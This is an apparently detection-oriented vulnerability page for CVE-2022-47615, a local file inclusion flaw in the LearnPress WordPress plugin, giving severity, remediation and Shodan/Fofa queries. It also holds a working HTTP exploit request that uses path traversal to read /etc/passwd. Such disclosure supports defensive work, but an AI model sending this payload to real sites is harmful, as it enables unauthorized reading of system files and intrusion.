🔙 목록으로 돌아가기

CVE-2022-47615: LearnPress Plugin < 4.2.0 - Local File Inclusion

TitleLearnPress Plugin < 4.2.0 - Local File Inclusion
AuthorDhiyaneshDK
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access to sensitive files, remote code execution, or information disclosure.
RemediationUpgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.878
CVE IDCVE-2022-47615
CWE IDCWE-434
Shodan Queryhttp.html:/wp-content/plugins/learnpress
Fofa Querybody=/wp-content/plugins/learnpress
Tags cve cve2022 wp-plugin wp wordpress learnpress lfi thimpress vkev vuln

🔍 Vulnerability Description

Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.

🌐 HTTP Request

GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-47615.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-47615.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A